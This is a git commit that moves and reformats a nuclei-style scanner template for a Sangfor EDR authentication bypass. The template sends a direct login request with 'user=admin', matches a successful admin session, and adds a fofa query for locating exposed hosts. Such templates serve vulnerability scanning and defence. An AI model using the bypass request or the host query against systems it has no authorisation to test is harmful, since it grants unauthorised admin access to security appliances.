Update and rename vulnerabilities/other/sangfor-edr-auth-bypass.yaml to vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml

2022-05-23 16:27:31 +05:30 · 2022-05-23 16:27:31 +05:30 · 5ad7e37a87
parent b8d2df57ba
commit 5ad7e37a87
1 changed files with 21 additions and 14 deletions
--- a/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml
+++ b/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml
@ -4,29 +4,36 @@ info:
  name: Sangfor EDR Authentication Bypass
  author: princechaddha
  severity: high
-  description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login
+  description: |
+    A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login
    screen without providing a username.
+  metadata:
+    fofa-query: app="sangfor"
  tags: sangfor,auth-bypass,login

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/ui/login.php?user=admin"
+
    matchers-condition: and
    matchers:
+      - type: word
+        part: body
+        words:
+          - "/download/edr_installer_"
+
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie=""'
+        negative: true
+
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie='
+
      - type: status
        status:
          - 302
-      - type: word
-        words:
-          - "/download/edr_installer_"
-        part: body
-      - type: word
-        words:
-          - 'Set-Cookie=""'
-        part: header
-        negative: true
-      - type: word
-        words:
-          - 'Set-Cookie='
-        part: header